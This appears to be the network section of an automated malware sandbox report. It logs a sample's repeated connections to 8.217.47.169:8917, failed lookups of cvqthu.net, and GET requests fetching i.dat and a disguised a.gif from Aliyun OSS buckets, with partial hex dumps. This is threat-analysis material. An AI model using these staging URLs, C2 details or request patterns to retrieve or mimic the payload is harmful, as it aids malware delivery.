                                              Jan 5, 2025 10:12:58.773554087 CET627908917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:12:58.778424978 CET8917627908.217.47.169192.168.2.6
                                              Jan 5, 2025 10:12:58.779582024 CET627908917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:12:59.159231901 CET627908917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:12:59.164045095 CET8917627908.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:00.878791094 CET8917627908.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:00.879678011 CET627908917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:00.883527994 CET627908917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:01.538414001 CET627918917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:01.543256044 CET8917627918.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:01.543600082 CET627918917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:01.913592100 CET627918917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:01.918467999 CET8917627918.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:03.603671074 CET8917627918.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:03.603842020 CET627918917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:03.603916883 CET627918917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:04.366511106 CET627928917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:04.371372938 CET8917627928.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:04.371505976 CET627928917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:04.737833023 CET627928917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:04.742661953 CET8917627928.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:06.426779032 CET8917627928.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:06.426856041 CET627928917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:06.426945925 CET627928917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:07.136288881 CET627938917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:07.141273022 CET8917627938.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:07.141403913 CET627938917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:07.549952030 CET627938917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:07.558180094 CET8917627938.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:09.215369940 CET8917627938.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:09.215452909 CET627938917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:09.215558052 CET627938917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:09.929563046 CET627948917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:09.934515953 CET8917627948.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:09.934653044 CET627948917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:10.327156067 CET627948917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:10.356261969 CET8917627948.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:11.991292953 CET8917627948.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:11.991435051 CET627948917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:11.991529942 CET627948917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:12.710227966 CET627958917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:12.715111971 CET8917627958.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:12.715219975 CET627958917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:13.218405962 CET627958917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:13.223253965 CET8917627958.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:14.770380020 CET8917627958.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:14.770477057 CET627958917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:14.770605087 CET627958917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:15.600898981 CET627968917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:15.605742931 CET8917627968.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:15.605849981 CET627968917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:16.082102060 CET627968917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:16.087007046 CET8917627968.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:17.659513950 CET8917627968.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:17.659580946 CET627968917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:17.659677029 CET627968917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:18.460390091 CET627978917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:18.465373993 CET8917627978.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:18.465837002 CET627978917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:18.989525080 CET627978917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:18.994410038 CET8917627978.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:20.519083977 CET8917627978.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:20.519150972 CET627978917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:20.519227028 CET627978917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:21.366345882 CET627988917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:21.371328115 CET8917627988.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:21.371454000 CET627988917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:22.042447090 CET627988917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:22.047386885 CET8917627988.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:23.409859896 CET8917627988.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:23.409998894 CET627988917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:23.410171986 CET627988917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:24.428858042 CET627998917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:24.433830976 CET8917627998.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:24.433960915 CET627998917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:24.740665913 CET627998917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:24.745604992 CET8917627998.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:26.491372108 CET8917627998.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:26.491624117 CET627998917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:26.491625071 CET627998917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:27.116605043 CET628008917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:27.121519089 CET8917628008.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:27.121601105 CET628008917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:27.317159891 CET628008917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:27.324004889 CET8917628008.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:29.198302031 CET8917628008.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:29.198379993 CET628008917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:29.198482037 CET628008917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:29.710515022 CET628018917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:29.715507984 CET8917628018.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:29.715666056 CET628018917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:29.939572096 CET628018917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:29.944462061 CET8917628018.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:31.796329021 CET8917628018.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:31.796607018 CET628018917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:31.796749115 CET628018917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:32.320012093 CET628028917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:32.325000048 CET8917628028.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:32.325154066 CET628028917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:32.516525984 CET628028917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:32.521496058 CET8917628028.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:34.437649012 CET8917628028.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:34.437791109 CET628028917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:34.437896967 CET628028917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:34.944503069 CET628038917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:34.949644089 CET8917628038.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:34.949723005 CET628038917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:35.141974926 CET628038917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:35.146820068 CET8917628038.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:37.007848024 CET8917628038.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:37.007965088 CET628038917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:37.008069992 CET628038917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:37.522749901 CET628048917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:37.527735949 CET8917628048.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:37.527832985 CET628048917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:37.750677109 CET628048917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:37.755518913 CET8917628048.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:39.627378941 CET8917628048.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:39.627523899 CET628048917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:39.627753973 CET628048917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:40.132335901 CET628058917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:40.137275934 CET8917628058.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:40.137377024 CET628058917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:40.322566032 CET628058917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:40.327446938 CET8917628058.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:42.218607903 CET8917628058.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:42.218677998 CET628058917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:42.218811035 CET628058917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:42.725975990 CET628068917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:42.730951071 CET8917628068.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:42.731069088 CET628068917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:42.987551928 CET628068917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:42.992537975 CET8917628068.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:44.792596102 CET8917628068.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:44.792665958 CET628068917192.168.2.68.217.47.169

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 5, 2025 10:11:06.450802088 CET5350162162.159.36.2192.168.2.6
                                              Jan 5, 2025 10:11:06.915935040 CET5031153192.168.2.61.1.1.1
                                              Jan 5, 2025 10:11:06.923161983 CET53503111.1.1.1192.168.2.6
                                              Jan 5, 2025 10:11:19.339256048 CET5430853192.168.2.61.1.1.1
                                              Jan 5, 2025 10:11:19.992727041 CET53543081.1.1.1192.168.2.6
                                              Jan 5, 2025 10:12:14.117712975 CET5966653192.168.2.61.1.1.1
                                              Jan 5, 2025 10:12:14.797923088 CET53596661.1.1.1192.168.2.6
                                              Jan 5, 2025 10:12:52.246855021 CET5426353192.168.2.61.1.1.1
                                              Jan 5, 2025 10:12:52.256486893 CET53542631.1.1.1192.168.2.6
                                              Jan 5, 2025 10:12:58.288768053 CET5889553192.168.2.61.1.1.1
                                              Jan 5, 2025 10:12:58.346003056 CET53588951.1.1.1192.168.2.6
                                              Jan 5, 2025 10:13:04.366784096 CET5568653192.168.2.61.1.1.1
                                              Jan 5, 2025 10:13:04.397310019 CET53556861.1.1.1192.168.2.6
                                              Jan 5, 2025 10:13:10.429404020 CET5075553192.168.2.61.1.1.1
                                              Jan 5, 2025 10:13:10.459749937 CET53507551.1.1.1192.168.2.6
                                              Jan 5, 2025 10:13:16.491738081 CET5436253192.168.2.61.1.1.1
                                              Jan 5, 2025 10:13:16.501750946 CET53543621.1.1.1192.168.2.6
                                              Jan 5, 2025 10:13:22.523117065 CET6400853192.168.2.61.1.1.1
                                              Jan 5, 2025 10:13:22.533145905 CET53640081.1.1.1192.168.2.6
                                              Jan 5, 2025 10:13:28.554100990 CET5056153192.168.2.61.1.1.1
                                              Jan 5, 2025 10:13:28.563180923 CET53505611.1.1.1192.168.2.6
                                              Jan 5, 2025 10:13:34.585477114 CET6179753192.168.2.61.1.1.1
                                              Jan 5, 2025 10:13:34.592746019 CET53617971.1.1.1192.168.2.6
                                              Jan 5, 2025 10:13:40.619319916 CET6387653192.168.2.61.1.1.1
                                              Jan 5, 2025 10:13:40.628900051 CET53638761.1.1.1192.168.2.6

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Jan 5, 2025 10:11:06.915935040 CET192.168.2.61.1.1.10x5968Standard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                              Jan 5, 2025 10:11:19.339256048 CET192.168.2.61.1.1.10xa740Standard query (0)msd1sq.oss-cn-beijing.aliyuncs.comA (IP address)IN (0x0001)false
                                              Jan 5, 2025 10:12:14.117712975 CET192.168.2.61.1.1.10xb4dcStandard query (0)22mm.oss-cn-hangzhou.aliyuncs.comA (IP address)IN (0x0001)false
                                              Jan 5, 2025 10:12:52.246855021 CET192.168.2.61.1.1.10x51b0Standard query (0)cvqthu.netA (IP address)IN (0x0001)false
                                              Jan 5, 2025 10:12:58.288768053 CET192.168.2.61.1.1.10x63ccStandard query (0)cvqthu.netA (IP address)IN (0x0001)false
                                              Jan 5, 2025 10:13:04.366784096 CET192.168.2.61.1.1.10xd285Standard query (0)cvqthu.netA (IP address)IN (0x0001)false
                                              Jan 5, 2025 10:13:10.429404020 CET192.168.2.61.1.1.10xe10Standard query (0)cvqthu.netA (IP address)IN (0x0001)false
                                              Jan 5, 2025 10:13:16.491738081 CET192.168.2.61.1.1.10x6b61Standard query (0)cvqthu.netA (IP address)IN (0x0001)false
                                              Jan 5, 2025 10:13:22.523117065 CET192.168.2.61.1.1.10x3ca9Standard query (0)cvqthu.netA (IP address)IN (0x0001)false
                                              Jan 5, 2025 10:13:28.554100990 CET192.168.2.61.1.1.10xc4c3Standard query (0)cvqthu.netA (IP address)IN (0x0001)false
                                              Jan 5, 2025 10:13:34.585477114 CET192.168.2.61.1.1.10xa69aStandard query (0)cvqthu.netA (IP address)IN (0x0001)false
                                              Jan 5, 2025 10:13:40.619319916 CET192.168.2.61.1.1.10x4f34Standard query (0)cvqthu.netA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Jan 5, 2025 10:11:06.923161983 CET1.1.1.1192.168.2.60x5968Name error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                              Jan 5, 2025 10:11:19.992727041 CET1.1.1.1192.168.2.60xa740No error (0)msd1sq.oss-cn-beijing.aliyuncs.comsc-257a.cn-beijing.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                              Jan 5, 2025 10:11:19.992727041 CET1.1.1.1192.168.2.60xa740No error (0)sc-257a.cn-beijing.oss-adns.aliyuncs.comsc-257a.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                              Jan 5, 2025 10:11:19.992727041 CET1.1.1.1192.168.2.60xa740No error (0)sc-257a.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com39.103.20.34A (IP address)IN (0x0001)false
                                              Jan 5, 2025 10:12:14.797923088 CET1.1.1.1192.168.2.60xb4dcNo error (0)22mm.oss-cn-hangzhou.aliyuncs.comsc-29j7.cn-hangzhou.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                              Jan 5, 2025 10:12:14.797923088 CET1.1.1.1192.168.2.60xb4dcNo error (0)sc-29j7.cn-hangzhou.oss-adns.aliyuncs.comsc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                              Jan 5, 2025 10:12:14.797923088 CET1.1.1.1192.168.2.60xb4dcNo error (0)sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com118.178.60.9A (IP address)IN (0x0001)false
                                              Jan 5, 2025 10:12:52.256486893 CET1.1.1.1192.168.2.60x51b0Name error (3)cvqthu.netnonenoneA (IP address)IN (0x0001)false
                                              Jan 5, 2025 10:12:58.346003056 CET1.1.1.1192.168.2.60x63ccName error (3)cvqthu.netnonenoneA (IP address)IN (0x0001)false
                                              Jan 5, 2025 10:13:04.397310019 CET1.1.1.1192.168.2.60xd285Name error (3)cvqthu.netnonenoneA (IP address)IN (0x0001)false
                                              Jan 5, 2025 10:13:10.459749937 CET1.1.1.1192.168.2.60xe10Name error (3)cvqthu.netnonenoneA (IP address)IN (0x0001)false
                                              Jan 5, 2025 10:13:16.501750946 CET1.1.1.1192.168.2.60x6b61Name error (3)cvqthu.netnonenoneA (IP address)IN (0x0001)false
                                              Jan 5, 2025 10:13:22.533145905 CET1.1.1.1192.168.2.60x3ca9Name error (3)cvqthu.netnonenoneA (IP address)IN (0x0001)false
                                              Jan 5, 2025 10:13:28.563180923 CET1.1.1.1192.168.2.60xc4c3Name error (3)cvqthu.netnonenoneA (IP address)IN (0x0001)false
                                              Jan 5, 2025 10:13:34.592746019 CET1.1.1.1192.168.2.60xa69aName error (3)cvqthu.netnonenoneA (IP address)IN (0x0001)false
                                              Jan 5, 2025 10:13:40.628900051 CET1.1.1.1192.168.2.60x4f34Name error (3)cvqthu.netnonenoneA (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • msd1sq.oss-cn-beijing.aliyuncs.com
                                              • 22mm.oss-cn-hangzhou.aliyuncs.com

                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.66273539.103.20.344432300C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                                              TimestampBytes transferredDirectionData
                                              2025-01-05 09:11:21 UTC111OUTGET /i.dat HTTP/1.1
                                              User-Agent: GetData
                                              Host: msd1sq.oss-cn-beijing.aliyuncs.com
                                              Cache-Control: no-cache
                                              2025-01-05 09:11:21 UTC557INHTTP/1.1 200 OK
                                              Server: AliyunOSS
                                              Date: Sun, 05 Jan 2025 09:11:21 GMT
                                              Content-Type: application/octet-stream
                                              Content-Length: 512
                                              Connection: close
                                              x-oss-request-id: 677A4CB999F00D3935655483
                                              Accept-Ranges: bytes
                                              ETag: "7E4165B1411CF0914B7DB88CBD5C6A68"
                                              Last-Modified: Sat, 04 Jan 2025 09:23:34 GMT
                                              x-oss-object-type: Normal
                                              x-oss-hash-crc64ecma: 6704561915333262350
                                              x-oss-storage-class: Standard
                                              x-oss-ec: 0048-00000113
                                              Content-Disposition: attachment
                                              x-oss-force-download: true
                                              Content-MD5: fkFlsUEc8JFLfbiMvVxqaA==
                                              x-oss-server-time: 3
                                              2025-01-05 09:11:21 UTC512INData Raw: 07 1b 1b 1f 6c 25 30 30 5d 43 54 01 72 70 2f 6e 1d 1d 43 0d 63 20 6f 68 01 02 01 06 61 28 67 6a 03 13 1f 04 67 77 2a 67 08 0a 48 06 28 61 6f 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 08 14 14 10 63 2a 3f 3f 52 4c 5b 0e 7d 7f 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 5e 40 57 02 71 73 2c 6d 1e 1e 40 0e 60 23 6c 6b 02 01 02 05 62 2b 64 69 00 10 1c 07 64 74 29 64 0b 09 4b 07 29 60 6e 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 09 15 15 11 62 2b 3e 3e 53 4d 5a 0f 7c 7e 21
                                              Data Ascii: l%00]CTrp/nCc oha(gjgw*gH(ao`````````````````````````````````c*??RL[} aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33^@Wqs,m@`#lkb+didt)dK)`naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab+>>SMZ|~!


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.66274939.103.20.344432300C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                                              TimestampBytes transferredDirectionData
                                              2025-01-05 09:11:23 UTC111OUTGET /a.gif HTTP/1.1
                                              User-Agent: GetData
                                              Host: msd1sq.oss-cn-beijing.aliyuncs.com
                                              Cache-Control: no-cache
                                              2025-01-05 09:11:23 UTC545INHTTP/1.1 200 OK
                                              Server: AliyunOSS
                                              Date: Sun, 05 Jan 2025 09:11:23 GMT
                                              Content-Type: image/gif
                                              Content-Length: 135589
                                              Connection: close
                                              x-oss-request-id: 677A4CBBE48B2B31372090B9
                                              Accept-Ranges: bytes
                                              ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
                                              Last-Modified: Sat, 04 Jan 2025 09:22:47 GMT
                                              x-oss-object-type: Normal
                                              x-oss-hash-crc64ecma: 8642451798640735006
                                              x-oss-storage-class: Standard
                                              x-oss-ec: 0048-00000104
                                              Content-Disposition: attachment
                                              x-oss-force-download: true
                                              Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
                                              x-oss-server-time: 2
                                              2025-01-05 09:11:23 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                              Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                              2025-01-05 09:11:23 UTC4096INData Raw: 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c 87
                                              Data Ascii: Xgf%a(|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\a*U##l3]x(*c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg|M[mm&}!rt=b!){{4{e5|8
                                              2025-01-05 09:11:23 UTC4096INData Raw: 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90 92
                                              Data Ascii: Il]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
                                              2025-01-05 09:11:23 UTC4096INData Raw: 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91 ea
                                              Data Ascii: c}.0Vm*O2O?:G6O#y;10[XhvX&*+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz|7I}r@|
